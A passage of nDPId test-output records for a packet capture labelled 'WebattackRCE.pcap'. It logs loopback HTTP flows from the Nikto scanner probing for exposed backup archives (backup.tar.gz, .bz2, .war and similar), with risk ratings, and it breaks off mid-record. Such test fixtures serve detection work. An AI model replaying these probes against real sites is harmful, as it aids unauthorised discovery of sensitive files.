-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277233,"pkt":"AAAAAAAAAAAAAAAACABFAADB+aZAAEAGQo5\/AAABfwAAAcRIH5BuH8E5NSGMTIAYAED+tQAAAQEICp1m\/RmdZv0ZR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277235,"pkt":"AAAAAAAAAAAAAAAACABFAADF6elAAEAGUkd\/AAABfwAAAcRKH5Ao6tF83Ul6FYAYAED+uQAAAQEICp1m\/RudZv0aR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277236,"pkt":"AAAAAAAAAAAAAAAACABFAADFYRdAAEAG2xl\/AAABfwAAAcRMH5CsR1mJC42rtYAYAED+uQAAAQEICp1m\/RydZv0cR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277237,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/lsZAAEAGpXB\/AAABfwAAAcROH5CjIq5axoK2IoAYAED+swAAAQEICp1m\/R2dZv0dR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277239,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HMpAAEAGH21\/AAABfwAAAcRQH5BQEyRWh8Tqd4AYAED+swAAAQEICp1m\/R+dZv0eR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277240,"pkt":"AAAAAAAAAAAAAAAACABFAADGqKRAAEAGk4t\/AAABfwAAAcRSH5A2yZA9R5wqAoAYAED+ugAAAQEICp1m\/SCdZv0gR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277242,"pkt":"AAAAAAAAAAAAAAAACABFAADGoOxAAEAGm0N\/AAABfwAAAcRUH5C09Jh1W5zr34AYAED+ugAAAQEICp1m\/SKdZv0iR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277243,"pkt":"AAAAAAAAAAAAAAAACABFAADIi9VAAEAGsFh\/AAABfwAAAcRWH5DRYLNOcO51UIAYAED+vAAAAQEICp1m\/SOdZv0jR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277244,"pkt":"AAAAAAAAAAAAAAAACABFAADIKHJAAEAGE7x\/AAABfwAAAcRYH5BlBxDwgejT24AYAED+vAAAAQEICp1m\/SSdZv0kR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277246,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/A9AAEAGQCF\/AAABfwAAAcRaH5B2IcSTgB9qe4AYAED+uQAAAQEICp1m\/SWdZv0lR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277247,"pkt":"AAAAAAAAAAAAAAAACABFAADFi69AAEAGsIF\/AAABfwAAAcRcH5D\/WbMzZ3h33IAYAED+uQAAAQEICp1m\/SedZv0nR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 